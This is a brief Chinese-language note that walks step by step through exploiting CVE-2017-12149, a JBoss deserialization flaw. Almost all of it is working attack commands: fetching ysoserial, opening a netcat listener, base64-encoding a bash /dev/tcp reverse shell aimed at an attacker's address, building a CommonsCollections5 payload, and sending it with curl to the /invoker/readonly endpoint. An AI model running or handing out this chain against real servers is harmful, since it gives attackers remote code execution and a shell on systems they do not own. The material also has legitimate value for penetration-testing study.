【笔记】CVE-2017-12149漏洞利用
前言
利用frohoff/ysoserial实现JBoss反序列化漏洞利用
默认端口1098,1099,4444,4445,8080,8009,8083,8093
下载项目
1 | wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar |
攻击者监听反弹Shell
1 | nc -lvp <port> |
将反弹Shell的命令进行Base64编码
1 | echo -n "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | base64 |
exp
- 在当前目录下生成
exp.ser文件
<base64>:上一步骤Base64编码后的反弹Shell命令
1 | java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,<base64>}|{base64,-d}|{bash,-i}" > exp.ser |
触发
1 | curl http://<ip>:<port>/invoker/readonly --data-binary @exp.ser |